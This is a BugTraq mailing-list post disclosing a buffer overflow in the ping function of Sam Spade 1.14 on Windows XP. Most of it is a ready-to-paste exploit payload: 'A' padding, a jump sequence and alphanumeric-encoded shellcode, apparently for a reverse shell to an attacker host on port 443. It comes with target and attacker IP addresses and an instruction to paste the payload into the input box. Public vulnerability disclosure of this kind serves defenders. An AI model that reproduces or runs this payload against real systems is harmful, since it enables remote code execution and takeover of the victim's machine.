BugTraq
SAMSPADE 1.14 BUFFER OVERFLOW Dec 12 2013 08:22AM
vishal_mishra live com
# Exploit Title: SAMSPADE 1.14 BUFFER OVERFLOW
# Date: 10-12-2013
# Exploit Author: VISHAL MISHRA & NIDHI VERMA
# Vendor Homepage: http://www.samspade.org/
# Software Link: http://www.majorgeeks.com/mg/getmirror/sam_spade,1.html
# Version: 1.1.4 (beta)
# Tested on: WINDOWS XP(sp2)
TARGET: windows xp(sp2) ip:192.168.117.129
ATTACKER: backtrack ip:192.168.117.131 PORT:443
Payload: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAj4?wTYIITYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlXhMYGpG
pEPQpMYM5EaXRE4LKRrP0LKRrVlLKCbEDLKQbQ8TOMgRjEvVQIoVQO0NLElPaQlVbVLQ0IQZ
oTMC1O7IrL0PRRwLKV2VpNkG2GLGqN0LKQPRXLEIPT4QZEQZpPPNkQXVxNkQHQ0C1ICZCGLQ
YLKVTNkC1XVTqIoEaO0LlO1XOTMEQXGTxM0CEZTGsQmZXEkQmGTQeIrV8LKChTdC1N3CVNkV
lRkLKQHELVaN3LKC4LKC1N0OyRdQ4GTCkQKPaRyPZCaKOKPQHQOCjLKR2ZKMVQMQxEcTrEPE
PCXRWRSP2QORtPhRlPwTfTGKOKeMhNpGqGpGpVIITCdRpPhQ9OpPkGpKON5PPRpV0V0CpV0C
pRpRHXjVoIOM0IoZuLIIWQxKpOXQeOsPhTBGpC1MkMYM6
QzR0QFCgQxOiLePtCQIoN5QxCSRMPdC0OyKSCgQGQGP1IfQzGbCiV6M2ImE6IWCtVDElVaVa
LMQTVDR0O6EPRdV4V0RvPVPVRfCfPNRvPVRsRvQxCIXLEoLFKOIENiM0PNCfG6KOP0CXC8MW
EMQpKOKeMkXpX5NBV6QxMvOeOMMMIoZuGLEVQlVjK0IkIpCEGuMkG7VsT2PoQzC0RsIoIEAA

This vulnerability is in ping operation of the software.Just the payload in input box.
VISHAL MISHRA
http://inf0rmati0ns3curity.blogspot.in/
http://instructionpointer.blogspot.in/
http://vishal--mishra.blogspot.in/

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus